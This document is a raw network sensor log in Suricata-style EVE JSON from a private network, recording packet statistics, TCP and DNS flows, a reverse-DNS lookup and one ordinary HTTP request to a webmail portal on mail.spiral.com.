{"timestamp":"2020-02-29T00:23:38.000217+0000","event_type":"stats","stats":{"uptime":15070,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} {"timestamp":"2020-02-29T00:23:38.001500+0000","flow_id":1879111253891026,"event_type":"flow","src_ip":"192.168.10.81","src_port":52966,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":784,"bytes_toclient":908,"start":"2020-02-29T00:22:32.464850+0000","end":"2020-02-29T00:22:37.472548+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:38.001723+0000","flow_id":503789711071144,"event_type":"flow","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":61,"pkts_toclient":77,"bytes_toserver":10547,"bytes_toclient":94902,"start":"2020-02-29T00:22:29.464808+0000","end":"2020-02-29T00:22:37.767328+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:38.001819+0000","flow_id":1506488481224280,"event_type":"flow","src_ip":"192.168.10.81","src_port":52962,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":784,"bytes_toclient":910,"start":"2020-02-29T00:22:32.464472+0000","end":"2020-02-29T00:22:37.471831+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:38.001870+0000","flow_id":381567826925203,"event_type":"flow","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1360,"bytes_toclient":1913,"start":"2020-02-29T00:22:32.464531+0000","end":"2020-02-29T00:22:37.472507+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:39.000252+0000","flow_id":12900719167830,"event_type":"flow","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":37,"bytes_toserver":4664,"bytes_toclient":43270,"start":"2020-02-29T00:22:32.362838+0000","end":"2020-02-29T00:22:38.037589+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:39.000471+0000","flow_id":730770142977525,"event_type":"flow","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":53,"pkts_toclient":73,"bytes_toserver":6982,"bytes_toclient":92760,"start":"2020-02-29T00:22:32.318965+0000","end":"2020-02-29T00:22:38.042472+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:44.000688+0000","flow_id":110173123482339,"event_type":"flow","src_ip":"192.168.10.122","src_port":49631,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:43.889571+0000","end":"2020-02-29T00:18:43.998032+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:45.000149+0000","event_type":"stats","stats":{"uptime":15077,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2861,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16855,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:23:47.000853+0000","flow_id":1826094178214393,"event_type":"flow","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1070,"bytes_toclient":732,"start":"2020-02-29T00:22:41.369145+0000","end":"2020-02-29T00:22:46.542040+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:52.000303+0000","event_type":"stats","stats":{"uptime":15084,"capture":{"kernel_packets":140243,"kernel_drops":0},"decoder":{"pkts":140247,"bytes":96281893,"invalid":195,"ipv4":138672,"ipv6":10,"ethernet":140247,"raw":0,"null":0,"sll":0,"tcp":133120,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2881,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2897,"synack":2888,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2508,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16855,"memcap_state":0,"memcap_global":0},"http":{"memuse":400,"memcap":0}}} {"timestamp":"2020-02-29T00:23:52.000998+0000","flow_id":1992764664025219,"event_type":"flow","src_ip":"192.168.10.122","src_port":52667,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:51.102531+0000","end":"2020-02-29T00:18:51.207491+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:53.234003+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36710,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3775,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:53.345755+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36710,"proto":"UDP","dns":{"type":"answer","id":3775,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:53.345755+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36710,"proto":"UDP","dns":{"type":"answer","id":3775,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:53.491588+0000","flow_id":1124622944265220,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52982,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090}} {"timestamp":"2020-02-29T00:23:57.000378+0000","flow_id":171140185030946,"event_type":"flow","src_ip":"192.168.10.122","src_port":35507,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:55.950562+0000","end":"2020-02-29T00:18:56.058921+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:58.492418+0000","flow_id":1124622944265220,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52982,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47021,"tx_id":0}} {"timestamp":"2020-02-29T00:23:59.000189+0000","event_type":"stats","stats":{"uptime":15091,"capture":{"kernel_packets":140249,"kernel_drops":0},"decoder":{"pkts":140266,"bytes":96292218,"invalid":195,"ipv4":138691,"ipv6":10,"ethernet":140266,"raw":0,"null":0,"sll":0,"tcp":133137,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2509,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16523,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:24:01.000154+0000","flow_id":1273696944968040,"event_type":"flow","src_ip":"192.168.10.122","src_port":38608,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:00.250216+0000","end":"2020-02-29T00:19:00.358727+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:04.000676+0000","flow_id":97064884588838,"event_type":"flow","src_ip":"192.168.10.122","src_port":42079,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:03.020774+0000","end":"2020-02-29T00:19:03.129636+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:06.000224+0000","event_type":"stats","stats":{"uptime":15098,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092448},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2512,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":0,"flows_timeout":3,"flows_timeout_inuse":2,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":15861,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:24:06.002115+0000","flow_id":181357912881723,"event_type":"flow","src_ip":"192.168.10.122","src_port":38040,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:05.227899+0000","end":"2020-02-29T00:19:05.336483+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:08.000606+0000","flow_id":767745518388486,"event_type":"flow","src_ip":"192.168.10.81","src_port":52970,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":4,"bytes_toserver":338,"bytes_toclient":921,"start":"2020-02-29T00:23:02.050438+0000","end":"2020-02-29T00:23:07.279817+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"13","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:08.000821+0000","flow_id":769897281519196,"event_type":"flow","src_ip":"192.168.10.122","src_port":56980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:06.949852+0000","end":"2020-02-29T00:19:07.058440+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:12.000443+0000","flow_id":2024272545427820,"event_type":"flow","src_ip":"192.168.10.122","src_port":58238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:11.635244+0000","end":"2020-02-29T00:19:11.743356+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:12.000847+0000","flow_id":1783625527824888,"event_type":"flow","src_ip":"192.168.10.122","src_port":51082,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:11.823800+0000","end":"2020-02-29T00:19:11.928718+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:13.000168+0000","event_type":"stats","stats":{"uptime":15105,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2863,"new_pruned":17,"est_pruned":2514,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":14537,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:24:18.000843+0000","flow_id":1934138362150047,"event_type":"flow","src_ip":"192.168.10.122","src_port":46219,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:17.310431+0000","end":"2020-02-29T00:19:17.418887+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:18.001101+0000","flow_id":836147152779304,"event_type":"flow","src_ip":"192.168.10.122","src_port":35956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:17.489512+0000","end":"2020-02-29T00:19:17.594290+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:19.002380+0000","flow_id":1779901807041841,"event_type":"flow","src_ip":"192.168.10.81","src_port":52976,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":913,"bytes_toclient":3914,"start":"2020-02-29T00:23:13.564529+0000","end":"2020-02-29T00:23:18.577333+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:20.000579+0000","event_type":"stats","stats":{"uptime":15112,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7090432},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2863,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":1,"flows_timeout":5,"flows_timeout_inuse":3,"flows_removed":2,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":400,"memcap":0}}} {"timestamp":"2020-02-29T00:24:21.000189+0000","flow_id":1553466836230670,"event_type":"flow","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":16,"bytes_toserver":3253,"bytes_toclient":13426,"start":"2020-02-29T00:23:13.565774+0000","end":"2020-02-29T00:23:19.064430+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:21.000541+0000","flow_id":1327585916188998,"event_type":"flow","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":30,"pkts_toclient":38,"bytes_toserver":7697,"bytes_toclient":42976,"start":"2020-02-29T00:23:13.555334+0000","end":"2020-02-29T00:23:19.063679+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:21.000749+0000","flow_id":1632747637355106,"event_type":"flow","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":52,"pkts_toclient":69,"bytes_toserver":11289,"bytes_toclient":73773,"start":"2020-02-29T00:23:10.307810+0000","end":"2020-02-29T00:23:19.067296+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:23.000496+0000","flow_id":2025049950055944,"event_type":"flow","src_ip":"192.168.10.130","src_port":34276,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":36,"pkts_toclient":64,"bytes_toserver":3765,"bytes_toclient":80837,"start":"2020-02-29T00:23:08.323080+0000","end":"2020-02-29T00:23:13.392667+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} 